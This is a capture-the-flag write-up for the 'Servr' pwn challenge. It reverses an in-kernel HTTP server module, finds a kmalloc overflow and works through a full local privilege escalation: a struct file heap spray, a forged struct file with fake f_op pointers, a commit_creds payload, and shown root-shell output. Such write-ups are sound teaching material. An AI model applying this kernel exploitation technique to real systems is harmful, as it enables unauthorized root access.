Servr - pwn 400

<< Pork - pwn 250

When someone told me to go check out this "web" chall, I was rather surprised, but I gave it a shot. The challenge came as an archive containing a QEMU-ready Linux system. The system boots perfectly fine, and /home/servr contains what looks like an LKM, servr.ko. First, I extracted the contents of the root filesystem:

$ tar -jxvf servr.tar.bz2
$ mkdir rootfs && cd rootfs
$ gzip -dcS .img ../servr/initramfs.img | cpio -id
3804 blocks
$ ls 
bin dev etc home init proc root sys tmp var
$ file home/servr/servr.ko 
home/servr/servr.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), [...], not stripped

So we do indeed have an x64 LKM to reverse. I guess I should take a look at web challenges more often :)

As the module is not stripped, reversing it is not nearly as painful as it could be. servr_init() sets up an in-kernel server socket:

void servr_init() {
	struct sockaddr_in addr;	// var_20 (0x10 bytes)

	workqueue = __alloc_workqueue_key("servr", 1, 0, 0);
	free_workqueue = __alloc_workqueue_key("servr_free", 1, 0, 0);

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = 2;		// AF_INET
	addr.sin_port = 0x5000;		// var_1E: htons(80)
	kernel_bind(server_sock, (struct sockaddr *)&addr, sizeof(addr));
	kernel_listen(server_sock, 10);

	server_sock->sk->sk_data_ready = server_sock_data_ready;

	printk("Module loaded\n");
}

The main information here is that the socket is TCP (AF_INET + SOCK_STREAM) and listens on port 80: sin_port is stored in network byte order, and htons(80) reads as 0x5000 on a little-endian machine. Its processing callback is server_sock_data_ready. That function does little more than queue the accept_connection job on the servr workqueue; the job is handled by accept_connection_cb, which calls kernel_accept() and sets callbacks on the newly accepted client sockets. Those callbacks follow the same pattern, from client_sock_data_ready to client_work_cb().
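
The port arithmetic can be checked with a tiny user-space sketch: sin_port holds the port in big-endian order, so 80 is stored as the bytes 00 50, which a little-endian 16-bit load (what the disassembler shows) reads as 0x5000. The helper names are purely illustrative.

```c
#include <stdint.h>

/* Bytes of a port in network (big-endian) order, as stored in sin_port */
static void port_to_net_bytes(uint16_t port, unsigned char out[2]) {
	out[0] = (unsigned char)(port >> 8);
	out[1] = (unsigned char)(port & 0xff);
}

/* Read two bytes as a little-endian 16-bit word, as an x86-64 load does */
static uint16_t load_le16(const unsigned char in[2]) {
	return (uint16_t)(in[0] | (in[1] << 8));
}
```

port_to_net_bytes(80, b) yields {0x00, 0x50}, and load_le16(b) gives back 0x5000, the immediate seen in servr_init().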

This function is much longer, so I won't detail it. Basically, it:

  1. reads data from the socket into a buffer that is kmalloc()ed and then grown with krealloc(), 0x100 bytes at a time
  2. once the data is complete, checks that it contains a "\r\n\r\n" token
  3. uses strsep() to check the method and HTTP version on the first line
  4. if these are OK, parses the headers to find the "Content-Length" header
  5. calls finish_handle_request() if no error occurred
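
To follow the disassembly more easily, here is a user-space sketch of steps 2 to 5. It is a model, not the module's code: parse_request() and next_line() are hypothetical names, and since the accepted methods and versions are not visible in the excerpts, the sketch only requires a three-part request line whose version starts with "HTTP/1.". The 0x1000 cap mirrors the bound check shown in the listing that follows.

```c
#define _DEFAULT_SOURCE /* strsep() on glibc */
#include <stdlib.h>
#include <string.h>

/* Split off one "\r\n"-terminated line (the last one may lack it) */
static char *next_line(char **cur) {
	char *line = strsep(cur, "\r");
	if (*cur && **cur == '\n')
		(*cur)++;
	return line;
}

/* Hypothetical model of client_work_cb()'s checks. buf must be a writable,
 * NUL-terminated request. Returns 0 and fills clength/body, or -1 on error. */
static int parse_request(char *buf, long long *clength, char **body) {
	char *end = strstr(buf, "\r\n\r\n");	/* step 2: end of headers */
	char *line, *method, *path, *version;

	if (!end)
		return -1;
	*end = '\0';
	*body = end + 4;
	*clength = 0;

	/* step 3: "METHOD PATH VERSION" on the first line */
	line = next_line(&buf);
	method = strsep(&line, " ");
	path = strsep(&line, " ");
	version = line;
	if (!*method || !path || !version || strncmp(version, "HTTP/1.", 7) != 0)
		return -1;

	/* step 4: look for Content-Length, parsed in base 10 */
	while (buf) {
		line = next_line(&buf);
		if (strncmp(line, "Content-Length:", 15) == 0) {
			char *val = line + 15, *endp;
			while (*val == ' ')
				val++;
			*clength = strtoll(val, &endp, 10);
			if (endp == val || *endp != '\0')
				*clength = 0;	/* like the module: bad value -> 0 */
		}
	}

	/* unsigned comparison, so negative lengths are rejected too */
	if ((unsigned long long)*clength > 0x1000)
		return -1;
	return 0;	/* step 5 would call finish_handle_request() here */
}
```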

The pointer to the request body (after "\r\n\r\n") is stored at r15 + 0x68 (= rbx + 0x60). The Content-Length header, if present, is parsed into r15 + 0x70 (= rbx + 0x68), whose address is kept in [rbp+var_B0]:

	mov [r11+10h], r14
	mov [r11+18h], r13
	mov rdi, offset aContentLength
	mov rsi, r14			; header name
	mov ecx, 0Fh			; compare 15 bytes
	repe cmpsb
	jz loc_B20			; header is Content-Length

	mov rdx, [rbp+var_B0]		; &clength (r15 + 70h)
	mov esi, 0Ah			; base 10
	mov rdi, r13			; header value
	mov [rbp+var_B8], r11
	call kstrtoll
	test eax, eax
	mov r11, [rbp+var_B8]
	jz loc_A5B
	mov qword ptr [r15+70h], 0	; parse error: clength = 0
	jmp loc_A5B

	mov rax, [rbx+68h]		; clength
	cmp rax, 1000h
	ja short send_error		; unsigned comparison

This field cannot be above 0x1000; since ja is an unsigned comparison, negative values are rejected as well. On to finish_handle_request(), which takes r15 as its only argument:

	mov rdi, [rdi+70h]		; clength
	test rdi, rdi
	jz loc_660			; clength == 0

	mov [rbx+80h], rdi
	mov esi, 80D0h			; GFP_KERNEL | __GFP_ZERO
	call __kmalloc			; kmalloc(clength)
	test rax, rax
	mov [rbx+78h], rax
	jz loc_660

	mov r8, 0D4B4F2030303220h	; " 200 OK\r"   (HTTP response headers)
	mov r9, 3A7265767265530Ah	; "\nServer:"
	mov r10, 312F727672657320h	; " servr/1"
	mov r11, 746E6F430A0D302Eh	; ".0\r\nCont"
	mov rcx, 702F74786574203Ah	; ": text/p"
	mov rdi, 312E312F50545448h	; "HTTP/1.1"
	mov rdx, 657079742D746E65h	; "ent-type"
	mov rsi, 0A0D0A0D6E69616Ch	; "lain\r\n\r\n"
	mov byte ptr [rbx+90h], 1
	mov [rax+8], r8
	mov [rax+10h], r9
	mov [rax+18h], r10
	mov [rax+20h], r11
	mov [rax+30h], rcx
	mov [rax], rdi
	mov [rax+28h], rdx
	mov [rax+38h], rsi
	mov byte ptr [rax+40h], 0
	mov rdi, [rbx+78h]
	mov rsi, [rbx+68h]		; src: request body
	mov rdx, [rbx+70h]		; n: clength
	add rdi, 40h			; dest: buffer + 0x40
	call memcpy
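
The eight 64-bit immediates are simply the response headers stored little-endian. This sketch (decode_header() is a hypothetical helper) replays the stores in buffer order and confirms that they spell out exactly 0x40 bytes, which is where the size of the overflow comes from.

```c
#include <stdint.h>
#include <string.h>

/* Immediates from finish_handle_request(), in buffer order (+0x00 .. +0x38) */
static const uint64_t hdr_qwords[8] = {
	0x312E312F50545448ULL, /* rdi -> [rax]      */
	0x0D4B4F2030303220ULL, /* r8  -> [rax+8]    */
	0x3A7265767265530AULL, /* r9  -> [rax+10h]  */
	0x312F727672657320ULL, /* r10 -> [rax+18h]  */
	0x746E6F430A0D302EULL, /* r11 -> [rax+20h]  */
	0x657079742D746E65ULL, /* rdx -> [rax+28h]  */
	0x702F74786574203AULL, /* rcx -> [rax+30h]  */
	0x0A0D0A0D6E69616CULL, /* rsi -> [rax+38h]  */
};

/* Store each qword little-endian, as the x86-64 movs do, then NUL at +0x40 */
static void decode_header(char out[0x41]) {
	for (int q = 0; q < 8; q++)
		for (int b = 0; b < 8; b++)
			out[q * 8 + b] = (char)((hdr_qwords[q] >> (8 * b)) & 0xff);
	out[0x40] = '\0';
}
```

The result is "HTTP/1.1 200 OK\r\nServer: servr/1.0\r\nContent-type: text/plain\r\n\r\n", 64 bytes long.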

finish_handle_request() kmalloc()s a buffer of Content-Length bytes, writes the 0x40 bytes of HTTP response headers at its start, and then appends the original request body with the final memcpy(). So 0x40 + Content-Length bytes are written into a buffer that is only Content-Length bytes long. This is a classic kmalloc() overflow, as the hints suggested.
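
To make the arithmetic concrete, here is a toy user-space model of that copy. It assumes the buffer lands in kmalloc-256 and that the next object of the slab sits right after it, modeling two adjacent 256-byte chunks as one flat array (real slabs only approximate this). simulate_response() is a hypothetical name. With Content-Length = 256, the last 0x40 bytes of the body end up at the start of the neighbouring chunk.

```c
#include <stddef.h>
#include <string.h>

#define CHUNK   256   /* object size of kmalloc-256 */
#define HDR_LEN 0x40  /* fixed HTTP response header */

/* Toy slab: chunk 0 plays kmalloc(clength), chunk 1 the next object */
static unsigned char slab[2 * CHUNK];

/* Mimic finish_handle_request(): header at +0, body copied at +0x40.
 * Returns the number of bytes written past the end of chunk 0,
 * or (size_t)-1 if clength does not fit the kmalloc-256 assumption. */
static size_t simulate_response(const unsigned char *body, size_t clength) {
	if (clength > CHUNK)
		return (size_t)-1;
	memset(slab, 'H', HDR_LEN);		/* stand-in for the header bytes */
	memcpy(slab + HDR_LEN, body, clength);	/* 0x40 + clength bytes in total */
	return HDR_LEN + clength > CHUNK ? HDR_LEN + clength - CHUNK : 0;
}
```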

To optimize allocations, the kernel pre-allocates pages (slabs) that each hold several chunks of the same size, either for well-known kernel objects such as inodes or task_structs, or for general-purpose allocations (kmalloc-32, kmalloc-96, kmalloc-1024, ...). To get more details on Linux kernel allocators, check out this article. The nice part here is that we control the length, so we can choose which kmalloc cache the buffer is allocated from. The less nice part is that the overflow is only 0x40 bytes, which isn't a whole lot.
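
Choosing the cache can be sketched as "smallest general cache that fits". The size list below is an assumption (the usual SLUB general caches on a 3.x x86-64 kernel; check /proc/slabinfo on the target), and kmalloc_cache() and overflow_len() are hypothetical helpers. The second one shows that only a Content-Length equal to a cache size yields the full 0x40-byte overflow; smaller values spend part of it in the chunk's slack.

```c
#include <stddef.h>

/* General-purpose kmalloc caches assumed for a 3.8 x86-64 SLUB kernel */
static const size_t kmalloc_sizes[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Smallest listed cache that fits `size`, or 0 if none does */
static size_t kmalloc_cache(size_t size) {
	for (size_t i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
		if (size <= kmalloc_sizes[i])
			return kmalloc_sizes[i];
	return 0;
}

/* Bytes spilling past the chunk when 0x40 header bytes + clength body
 * bytes are copied into kmalloc(clength) */
static size_t overflow_len(size_t clength) {
	size_t chunk = kmalloc_cache(clength);
	size_t written = 0x40 + clength;
	return written > chunk ? written - chunk : 0;
}
```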

The usual approach to kmalloc overflows is to force a well-known kernel object to be allocated right after the overflowed one. We spray the slab with a particular kernel object by triggering lots of allocations from userspace. We free one of them (kfree()). We then allocate a chunk of the same size, which should land in the slot of the freed object, just before one of the other sprayed objects. If that object contains a function pointer, or a pointer that is dereferenced to write data in a kernel path we can trigger from userspace, we can execute code in ring 0.
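
The spray/free/reallocate sequence relies on the allocator handing back the most recently freed chunk. Below is a deliberately simplified toy model, not SLUB itself (which has per-CPU freelists, partial slabs and other concurrent users): a LIFO freelist over one slab of 8 chunks, with hypothetical names toy_slab, toy_alloc() and toy_free(). After filling the slab and freeing chunk 3, the next allocation gets chunk 3 back, right before the still-live chunk 4.

```c
#define NOBJ 8

/* Toy slab: NOBJ chunks whose free slots are kept on a LIFO stack */
struct toy_slab {
	int freelist[NOBJ];
	int nfree;
};

static void toy_init(struct toy_slab *s) {
	s->nfree = 0;
	for (int i = NOBJ - 1; i >= 0; i--)
		s->freelist[s->nfree++] = i;	/* chunk 0 is handed out first */
}

/* Pop the most recently pushed free chunk, or -1 if the slab is full */
static int toy_alloc(struct toy_slab *s) {
	return s->nfree ? s->freelist[--s->nfree] : -1;
}

/* Push a freed chunk: it becomes the next one handed out */
static void toy_free(struct toy_slab *s, int idx) {
	s->freelist[s->nfree++] = idx;
}
```

In the real kernel, other allocations in the same cache can grab freed slots before ours, which is why freeing a single object is not always enough.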

A nice struct to overwrite is struct file, as it contains f_op, a pointer to a structure of function pointers. So the idea is to create a lot of files, find out which slab the structs are allocated in, and perform the overflow in that one: exactly what I didn't do during the actual CTF, as I was sure that struct file had to be in kmalloc-128 (gg no re). We can change the init file to set uid=0 so that we can read /proc/slabinfo (repack the initramfs by running find . | cpio --create --format='newc' > /tmp/initramfs.img from the root of the extracted tree, then gzip it).

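#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void dump_slabinfo(void) {	/* needs root, hence the init change */
	char line[256];
	FILE *f = fopen("/proc/slabinfo", "r");
	while (f && fgets(line, sizeof(line), f))
		fputs(line, stdout);
	if (f) fclose(f);
}

int main() {
	int i;
	int * files = NULL;
	char tmpfile[100];
	dump_slabinfo();
	/* Spray slab with file structs until open() fails (fd limit reached) */
	for (i=0;;i++) {
		sprintf(tmpfile, "/tmp/tmpfile%d", i);
		files = realloc(files, (i+1)*sizeof(int));
		if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC, 0600)) < 0)
			break;
	}
	if (i > 0) close(files[i-1]);	/* free one fd for /proc/slabinfo */
	printf("[+] Created %d files\n", i);
	dump_slabinfo();
	return 0;
}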

We close one file descriptor, otherwise we could not open /proc/slabinfo. Comparing the two slabinfo dumps shows several differences:

# /home/servr/test
# name <active_objs> [...]
inode_cache 3276
dentry 3276
kmalloc-256 448 
kmalloc-16 2560 
[+] Created 1021 files
# name <active_objs> [...]
inode_cache 4298
dentry 4305
kmalloc-256 1456
kmalloc-16 3584
/ #
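
Comparing the dumps by hand gets tedious; a small helper can pull <active_objs> for a given cache out of the text. active_objs() is a hypothetical helper that assumes the "name active_objs ..." column order of /proc/slabinfo shown above.

```c
#include <stdio.h>
#include <string.h>

/* Return <active_objs> for cache `name` in /proc/slabinfo-style text,
 * or -1 if no line starts with exactly that cache name. */
static long active_objs(const char *slabinfo, const char *name) {
	size_t n = strlen(name);
	const char *line = slabinfo;

	while (line && *line) {
		long count;
		if (strncmp(line, name, n) == 0 && (line[n] == ' ' || line[n] == '\t') &&
		    sscanf(line + n, "%ld", &count) == 1)
			return count;
		line = strchr(line, '\n');	/* advance to the next line */
		if (line)
			line++;
	}
	return -1;
}
```

On the dumps above, kmalloc-256 goes from 448 to 1456 active objects, a delta of 1008 for 1021 files.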

As expected, the numbers of inodes, dentries, etc. go up, as well as two general-purpose kmalloc caches. A struct file is far bigger than 16 bytes, so it has to be kmalloc-256, which grew by 1008 objects for 1021 files. Knowing this, we allocate a large number of files, delete one of them, trigger the overflow, and then call write() on every file. If one of the struct file objects has been overwritten, the kernel should crash. In practice, nothing happens. This may be because other objects are allocated in this slab before the targeted kmalloc() happens, so we need to delete more files. Nothing with 2 files either, so let's try 3:

/ $ /home/servr/test 3
[+] Created 1021 files
[+] Payload sent (296 bytes)
[ 10.025136] general protection fault: 0000 [#1] SMP 
[ 10.025136] Modules linked in: servr(O)
[ 10.025136] CPU 0 
[ 10.025136] Pid: 840, comm: test Tainted: G O 3.8.7 #35 Bochs Bochs
[ 10.025136] RIP: 0010:[<ffffffff8112dd12>] [<ffffffff8112dd12>] vfs_write+0x32/0x180
[ 10.025136] RSP: 0018:ffff880002faff08 EFLAGS: 00000206
[ 10.025136] RAX: 4141414141414141 RBX: ffff880002832900 RCX: ffff880002faff50
[ 10.025136] [<ffffffff8112e0bd>] sys_write+0x4d/0x90
[ 10.025136] [<ffffffff8178c052>] system_call_fastpath+0x16/0x1b
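
The run above reports a 296-byte payload. The exact request is not shown in this writeup; assuming a minimal POST with a 256-byte body (to target kmalloc-256 and get the full 0x40-byte overflow), the headers take exactly 40 bytes, which is consistent with that figure. build_payload() is a hypothetical helper.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: "POST / HTTP/1.1\r\nContent-Length: N\r\n\r\n"
 * followed by the raw body. Returns the total length, or 0 if cap is too small. */
static size_t build_payload(char *out, size_t cap, const char *body, size_t len) {
	int hdr = snprintf(out, cap, "POST / HTTP/1.1\r\nContent-Length: %zu\r\n\r\n", len);

	if (hdr < 0 || (size_t)hdr >= cap || (size_t)hdr + len > cap)
		return 0;
	memcpy(out + hdr, body, len);	/* body need not be NUL-terminated */
	return (size_t)hdr + len;
}
```

Under the toy model above, the last 0x40 bytes of the body are what lands at the start of the neighbouring struct file, so that is where fake f_path.dentry, f_op and f_mode values would go.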

It works: RAX holds our 0x41 filler bytes and vfs_write() faults. Now we just have to craft our fake struct file so that it passes the checks in vfs_write() and in its callees such as rw_verify_area(). Those functions are short, so this is pretty easy:

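/* Pointers to user-space buffers (write_addr points to leetbbq()); the kernel
 * can still dereference them during our write() syscall. */
char *dentry_addr, *inode_addr, *i_security_addr;
char *f_op_addr, *write_addr, *aio_write_addr;

void setup_file(char * file) {
	*(char **)(file + 0x18) = dentry_addr;		// file->f_path.dentry
	*(char **)(dentry_addr + 0x30) = inode_addr;	// dentry->d_inode
	*(char **)(inode_addr + 0x38) = i_security_addr;	// inode->i_security
	*(char **)(inode_addr + 0x138) = 0;		// inode->i_flock

	*(char **)(file + 0x20) = f_op_addr;		// file->f_op
	*(char **)(f_op_addr + 0x18) = write_addr;	// f_op->write
	*(char **)(f_op_addr + 0x28) = aio_write_addr;	// f_op->aio_write

	*(file + 0x3c) = 2; // f_mode: FMODE_WRITE
	*(file + 0x3f) = 1; // f_mode: FMODE_NONOTIFY (0x1000000)
	*(char **)(file + 0x40) = 0;	// f_pos
}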

All those addresses can be arbitrary, as long as they are valid. Because we switch directly from userland to kernel space through a write() syscall, our process's address space is still mapped while the kernel code runs, so they can simply point to user-space memory. The pointer that gets called is f_op->write, so write_addr points to a classic kernel exploit payload:

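int __attribute__((regparm(3))) leetbbq() {
	commit_creds(prepare_kernel_cred(0));	// addresses resolved at runtime
	return 0; // 0 bytes written: vfs_write() skips fsnotify_modify()
}
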
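
The magic offsets in setup_file() (0x18, 0x20, 0x3c, 0x40) can be cross-checked against the kernel headers. The sketch below is a hypothetical user-space mirror of the beginning of struct file as I believe it is laid out in Linux 3.8 on SMP x86-64 without spinlock debugging; types only reproduce field sizes, and the layout should be verified against the actual kernel source.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the start of struct file (Linux 3.8, x86-64,
 * CONFIG_SMP, no spinlock debugging). Types only reproduce the sizes. */
struct fake_file {
	void *f_u[2];          /* union: list_head / rcu_head, 16 bytes */
	void *f_path_mnt;      /* f_path.mnt */
	void *f_path_dentry;   /* f_path.dentry */
	const void *f_op;      /* const struct file_operations * */
	uint32_t f_lock;       /* spinlock_t */
	int32_t f_sb_list_cpu; /* only present with CONFIG_SMP */
	int64_t f_count;       /* atomic_long_t */
	uint32_t f_flags;
	uint32_t f_mode;       /* fmode_t */
	int64_t f_pos;         /* loff_t */
};

#define FMODE_WRITE    0x2u
#define FMODE_NONOTIFY 0x1000000u   /* value assumed for 3.8 */

_Static_assert(offsetof(struct fake_file, f_path_dentry) == 0x18, "f_path.dentry");
_Static_assert(offsetof(struct fake_file, f_op) == 0x20, "f_op");
_Static_assert(offsetof(struct fake_file, f_mode) == 0x3c, "f_mode");
_Static_assert(offsetof(struct fake_file, f_pos) == 0x40, "f_pos");
```

Stored little-endian, FMODE_WRITE | FMODE_NONOTIFY is the byte 2 at 0x3c and the byte 1 at 0x3f, exactly what setup_file() writes.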
The full exploit code is available here:
/ $ /home/servr/sploit 3
[+] Looking up kernel symbols...
[+] Resolved symbol commit_creds to 0xffffffff81063250
[+] Resolved symbol prepare_kernel_cred to 0xffffffff81063510
[+] Created 1021 files
[+] Payload sent (296 bytes)
[+] Launching root shell!
/ # id
uid=0(root) gid=0(root)
/ # 

A shame that, for some reason, I spent the whole Sunday blindly overflowing into kmalloc-128... Great CTF challenge, PPP delivers yet again.



  1. FrizN 05/04/13 13:39

    You can either echo -en the hex version of your executable, or base64-encode it, for instance. I'll update the article with that next week.

  2. Anonyme 05/04/13 13:15

    Excellent post. Could you please give the steps to compile/port the code to the QEMU image?


  3. Anon 04/26/13 00:40

    Excellent article !